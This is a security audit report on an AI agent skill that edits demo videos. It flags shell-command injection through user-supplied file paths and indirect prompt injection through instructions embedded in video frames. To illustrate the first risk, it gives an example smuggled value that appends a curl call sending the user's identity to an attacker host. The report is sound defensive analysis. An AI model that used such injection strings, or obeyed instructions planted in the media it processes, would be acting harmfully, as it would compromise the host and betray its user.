app-demo-agent

Warn

Audited by Gen Agent Trust Hub on Apr 3, 2026

Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The instructions in SKILL.md (specifically Steps 2, 3, 4, 5, 7, and 8) direct the agent to execute shell commands using placeholders for user-supplied data, such as INPUT_VIDEO and background colors. If a user provides a maliciously crafted string (e.g., path/to/video.mp4; curl http://attacker.com/$(whoami)), it could result in arbitrary command execution on the host system.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection (Category 8) as it processes untrusted video content to generate descriptive narration.
  • Ingestion points: User-provided video files specified by the INPUT_VIDEO path in SKILL.md.
  • Boundary markers: Absent; the skill lacks delimiters or instructions to ignore embedded visual or text-based prompts within the video frames during analysis.
  • Capability inventory: Execution of ffmpeg and ffprobe, file system writes for project management, and network API interactions via referenced TTS and music generation scripts.
  • Sanitization: Absent; there is no validation of the video content or sanitization of user-provided file paths before they are used in sensitive subprocess operations.
  • [SAFE]: The Python script scripts/extract_frames.py follows security best practices by using the list-based subprocess.run method rather than shell-string execution, which mitigates injection risks within the script itself.
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 3, 2026, 08:40 PM